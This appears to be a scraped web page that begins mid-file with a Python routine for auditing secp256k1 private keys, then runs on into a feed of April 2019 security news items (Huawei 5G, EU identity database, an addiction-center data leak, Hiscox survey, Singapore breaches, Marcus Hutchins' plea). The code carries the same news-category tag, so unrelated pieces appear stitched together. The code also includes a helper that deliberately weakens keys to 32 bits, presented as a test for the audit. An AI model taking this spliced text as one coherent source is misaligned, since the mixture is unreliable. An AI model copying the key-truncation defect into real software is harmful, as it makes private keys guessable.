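        if 1 <= int.from_bytes(key, "big") < SECP256K1_N:
            return key


def simulate_32bit_truncation(key: bytes) -> bytes:
    """Hypothetical defect: the key is pushed through a 32-bit integer
    somewhere in the pipeline, so only the low 32 bits survive.  Constructed
    here to demonstrate what an audit must catch, not taken from any real code."""
    truncated = int.from_bytes(key, "big") & 0xFFFFFFFF
    return truncated.to_bytes(KEY_BYTES, "big")


def audit_private_key(key: bytes, min_effective_bits: int = 128) -> List[str]:
    """Return a list of findings for gross defects in a stored private key.

    An empty list means nothing obvious is wrong; it does NOT prove the key
    was generated from good entropy.  Uniqueness across a population of keys
    also cannot be judged from a single key and must be checked elsewhere."""
    findings: List[str] = []
    if len(key) != KEY_BYTES:
        findings.append(f"wrong length: {len(key)} bytes, expected {KEY_BYTES}")
    value = int.from_bytes(key, "big")
    # Zero and values >= n are not valid scalars and must never be used.
    if value == 0 or value >= SECP256K1_N:
        findings.append("value outside [1, n-1]")
    # A key whose leading bytes are all zero is the signature of truncation
    # (or of an integer being cast to a narrower type): its search space is tiny.
    if value.bit_length() < min_effective_bits:
        findings.append(f"only {value.bit_length()} effective bits (possible truncation)")
    # Two or fewer distinct byte values is a crude low-entropy indicator.
    if len(set(key)) <= 2:
        findings.append("byte pattern too repetitive")
    return findings


if __name__ == "__main__":
    good = generate_private_key()
    print("fresh CSPRNG key findings:", audit_private_key(good))
    print("after simulated 32-bit truncation:", audit_private_key(simulate_32bit_truncation(good)))
```

The audit deliberately stays simple: it catches the key-shape errors ISE lists (truncation, zero or out-of-range values, obviously patterned bytes) but cannot detect a key that has the right shape and was still produced by a predictable generator, which is why the generation side must use a CSPRNG rather than a general-purpose `random` routine.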

Categories: Cyber Risk News

UK Government Allows Huawei to Provide ‘Non-Core’ 5G Kit

Info Security - Wed, 04/24/2019 - 09:07

The British government has decided to allow Huawei to provide equipment for carriers’ 5G networks, but only ‘non-core’ technology, according to reports.

Prime Minister Theresa May made the decision after a meeting of the National Security Council (NSC), despite apparent concerns raised by foreign secretary Jeremy Hunt, home secretary Sajid Javid, defence secretary Gavin Williamson, and international development secretary Penny Mordaunt.

The partial ban will see the Shenzhen giant only able to provide equipment such as antennas, which are not deemed a potential national security risk. However, the distinction between what constitutes the 5G core and non-core has been questioned by intelligence chiefs.

Australian Signals Directorate director-general, Mike Burgess, warned in a speech last year: “The distinction between core and edge collapses in 5G networks. That means that a potential threat anywhere in the network will be a threat to the whole network.”

For its part, GCHQ has been fairly measured in its treatment of Huawei, despite growing pressure from the US to follow its lead with an outright ban.

In a speech in Singapore earlier this year, director Jeremy Fleming focused on the need for greater competition in the 5G market to improve cybersecurity. That echoed his counterpart at the National Cyber Security Centre (NCSC), Ciaran Martin, who argued that its evaluation center had found “serious problems with [Huawei’s] security and engineering processes.”

“As we said then, and repeat today, these problems are about standard of cybersecurity; they are not indicators of hostile activity by China,” he continued.

The UK decision will not go down well in Washington, which has already threatened allies such as Germany by claiming it will withhold intelligence information in the future if the country allows Huawei to build its 5G networks, fearing Chinese snoopers may be listening in.

Australia has stood by its Five Eyes partner the US in issuing a total ban on Huawei for 5G networks, while the New Zealand Government Communications Security Bureau is still deciding. The Chinese firm opened a transparency center in Brussels recently in a bid to convince local lawmakers that it poses no threat.

Categories: Cyber Risk News

European Parliament Approves Mass ID Database Plans

Info Security - Tue, 04/23/2019 - 10:35

The European Parliament has approved plans to boost physical security by implementing a mass identity database, although privacy concerns persist.

The Common Identity Repository (CIR) will centralize the personal information of nearly all non-EU citizens in the EU’s visa-free Schengen region. The latter covers most EU member states, excluding Ireland and the UK as well as Bulgaria, Croatia, Cyprus, and Romania.

The data — which will include fingerprints, names, addresses, photos and other info — will be consolidated from five separate systems, including databases of asylum seekers, short-stay visa applicants, and those with previous criminal convictions in the EU.

The idea is that it will enhance security in the region by minimizing information gaps and silos, helping law enforcers track terrorists and serious criminals who may otherwise be able to slip across borders undetected. Data on an estimated 300 million non-EU and some EU citizens will be stored in the CIR, according to reports.

“Global law enforcement agencies and border control personnel have been sharing information about people for decades, if not centuries,” argued John Gunn, CMO at OneSpan.

“CIR is a very positive move that will simply make the methods more timely, efficient, and effective resulting in speedier cross-border travels with less hassle and in greater safety for all as those with evil intent are more easily identified and stopped.”

However, others have voiced concerns that there are not enough safeguards to protect individual freedoms, and that the database could be a major target for hackers. EU privacy advisory body the Article 29 Working Party (WP29) explained these at length in a document last year.

“Regarding the Common Identity Repository (CIR), the WP29 is of the view that the cross-matching of various sources for identification and consolidating them in a new common database for the purpose of overall identification poses an additional interference with the rights to privacy and data protection,” it said.

“The WP29 is not convinced of the necessity and proportionality to establish such a mixed-purpose identification database including biometric data. Whether identity fraud is in practice such an essential threat to the internal security of the Union as to justify the central registering of biometric identifiers of all bona fide [third country nationals] TCN travellers, migrants and asylum seekers is not yet sufficiently established in terms of proportionality and therefore remains an issue of major concern.”

Categories: Cyber Risk News

Addiction Center Patients Exposed in Privacy Snafu

Info Security - Tue, 04/23/2019 - 09:28

A large trove of personally identifiable information (PII) has been leaked by an addiction treatment center after researchers found another unsecured Elasticsearch database online.

Justin Paine, who is also a director of trust and safety at Cloudflare, blogged about his findings late last week, claiming to have found the offending database via a simple Shodan search.

As the data trove required no authentication to access, he was able to scroll through the 1.45GB of information. Although there were nearly five million documents contained in the database, they related in the end to around 146,000 unique patients.

Paine traced them back to Pennsylvania-based addiction treatment center Steps to Recovery.

“A leak of PII related to 146,316 unique patients would be bad on any day. It's particularly bad when it is something as sensitive as an addiction rehab center. Given the stigma that surrounds addiction this is almost certainly not information the patients want easily accessible,” he argued.

“What could a malicious user do with this data? Based on the patient name it was simple to locate all medical procedures a specific person received, when they received those procedures, how much they were billed, and at which specific facility they received treatment.”

After a few cursory Google searches, he was also able to determine with “high confidence” a patient’s age, birthdate, address, previous addresses, family members’ names, their political affiliation, phone numbers and email addresses.

Despite contacting the firm about the privacy snafu at the end of March, Paine had received no response as of April 15 and there are concerns that it has still not notified patients about the risk of identity theft. However, a message he sent to the hosting provider was received and access to the database subsequently restricted.

It’s just the latest in a long line of incidents involving misconfigured Elasticsearch instances. One revealed in November last year exposed the PII of nearly 82 million Americans.

Categories: Cyber Risk News

Cyber Readiness Worsens as Attacks Soar

Info Security - Tue, 04/23/2019 - 09:02

The number of organizations in Europe and the US that have been hit by a cyber-attack over the past year has soared to over three-fifths (61%), according to a new report from Hiscox.

The global insurer today released the results of its Hiscox Cyber Readiness Report 2019, which is compiled from interviews with over 5300 cybersecurity professionals in the US, UK, Belgium, France, Germany, Spain and the Netherlands.

It revealed a sharp increase in the number of firms suffering an attack, up from 45% in the 2018 report. In the UK, the figure rose from 40% to 55%.

There was also a rise in the number of small (from 33% to 47%) and medium-sized businesses (36% to 63%) reporting an attack, across the US and Europe.

Two-thirds of firms (65%) on average claimed to have been hit by supply chain cyber incidents.

Average losses were also up by 61%, from $229,000 last year to $369,000 this year; for large firms the figure exceeded $700,000, versus just $162,000 in 2018.

Although cybersecurity spending went up by 24% over the past year to reach $1.45m, only 10% of responding organizations were classed as “experts” in terms of their cyber-readiness, with nearly three-quarters (74%) described as unprepared “novices.” Disappointingly, there was a sizeable drop in the number of large US and German firms achieving “expert” scores.

Hiscox cyber CEO, Gareth Wharton, argued that cyber-attacks have become “the unavoidable cost of doing business today.” 

“This is the third Hiscox Cyber Readiness Report and, for the first time, a significant majority of firms report one or more cyber-attacks in the past 12 months. Where hackers formerly focused on larger companies, small and medium-sized firms now look equally vulnerable,” he explained.

“The one positive is that we see more firms taking a structured approach to the problem, with a defined role for managing cyber strategy and an increased readiness to transfer the risk to an insurer by way of a standalone cyber-insurance policy.”

Categories: Cyber Risk News

Singapore Responds to Recent Cybersecurity Attacks

Info Security - Mon, 04/22/2019 - 14:49

During a visit to San Francisco, Singapore foreign affairs minister Vivian Balakrishnan commented that the country cannot "go back to pen and paper. ... If people lose confidence in the integrity and security of the system, then all these aspirations cannot be fulfilled."

The comments follow information coming into the open regarding data breaches, one of which affected 14,200 individuals diagnosed with HIV up to January 2013. In a statement by the police, it was confirmed that the information was "in the possession of an unauthorized person" and had been illegally disclosed online.

The statement went on to say that the information was in the possession of Mikhy K. Farrera Brochez, a male US citizen residing in Singapore between January 2008 and June 2016. He was convicted of fraud and drug-related offences in March 2017, sentenced to 28 months in prison and deported from Singapore. The fraud offences were in relation to Brochez lying about his HIV status to the Ministry of Manpower in order to obtain and maintain his employment pass.

According to Bloomberg, Balakrishnan said the government’s response to recent cybersecurity attacks and human leaks has to be one where "it’s completely open." It follows the first meeting of the Public Sector Data Security Review Committee, which was held on April 18, 2019, according to a government statement. 

Bloomberg reported that attendees of the meeting "reviewed past data incidents" and broad approaches to raise the bar of security. The committee will submit its final report to the prime minister by the end of November 2019. 

Singapore has been trying to position itself as a "Smart Nation," with initiatives focusing on digital identity, smart urban mobility and e-payments. However, the data breaches have made many people nervous, especially as the government's artificial intelligence (AI) ambitions are clear.

“The ability to deploy AI in our respective fields should be commoditized,” Balakrishnan said. “We will be one of the earliest adopters of these new technologies.”

Categories: Cyber Risk News

WannaCry 'Hero' Pleads Guilty to Writing Malware in US Court

Info Security - Mon, 04/22/2019 - 14:04

Marcus Hutchins, also known as MalwareTech, has pleaded guilty in a US court to two counts of creating and spreading malware. The reverse-engineer is well known for his contribution to ending the WannaCry ransomware attacks in May 2017. 

According to Wisconsin court documents, Hutchins was charged in "10 counts of a superseding indictment." He pleaded guilty to counts one and two, saying that the US government would be able to prove that "between July 2012 and September 2016, [he] helped create and, in partnership with another, sell malicious computer code, aka malware, known as UPAS-Kit and Kronos."

Arrested in August 2017 at the Las Vegas airport by the FBI, Hutchins was accused of creating and spreading the banking Trojan Kronos, followed by additional charges in June 2018 relating to developing and distributing UPAS Kit, a "modular HTTP bot" designed to install on victims’ machines without alerting AV tools. He denied the former in 2017, making this a complete turnaround on his previous plea.

Kronos targeted banking information and was valued at $7,000 on the dark web.

Hutchins made a public statement in response to reports of his plea: "As you may be aware, I’ve pleaded guilty to two charges related to writing malware in the years prior to my career in security. I regret these actions and accept full responsibility for my mistakes. Having grown up, I’ve since been using the same skills that I misused several years ago for constructive purposes. I will continue to devote my time to keeping people safe from malware attacks."

The WannaCry attacks took place in May 2017, with Telefonica being the first victim. The attacks happened worldwide, including at the UK's National Health Service (NHS), and impacted more than 150 countries. Hutchins created a kill switch, which helped organizations globally stop the ransomware. He won an award for his contribution, as many said the impact would have been worse without it.

According to the Wisconsin court documents, Hutchins could face up to six years in prison and a $250,000 fine.

Categories: Cyber Risk News
